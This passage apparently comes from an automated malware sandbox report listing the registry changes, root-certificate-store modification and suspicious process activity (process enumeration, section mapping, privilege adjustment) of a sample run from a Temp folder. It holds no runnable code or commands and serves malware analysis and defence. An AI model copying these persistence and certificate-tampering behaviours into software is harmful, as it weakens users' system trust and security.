Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bbd2da6efca7814e97bd67c6ea97aa8b00000000020000000000106600000001000020000000016d9c2c306d28307fb5b14b069685a2ac214a04555ea9748ff270b2b1e505ee000000000e80000000020000200000006251ea0209b2f7d74f7d424f6814d0d297637ee05696b97f1a70d20b331428919000000022ff4731c3440c97306429f694c321d7f60b7d6d1c6237b6b88e92378188b167deca17d1107c7dbb350e9777a398ea48999b411aff26ee1cca89c494e859c9f97760a82a06296b67085ef3b82d2cafbe94466b657cf25e2ff9c75c2ba97a05d8235c43c7f77f1cd371c05064332add1cd320b3dfdcfe1b738235fe7cb5dd91a0944980956bad99082ba0ff36658d7c5940000000a09a7f73297296d6eb7e6383d67fe95bf7d4a0d2f498b7d2e2640dbf9a247717d29f461ae0712275885c897bfc7e8ca313c8be2d8327ace4296b353085e6fa68 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "403141429" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000019000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\3414.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\3414.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
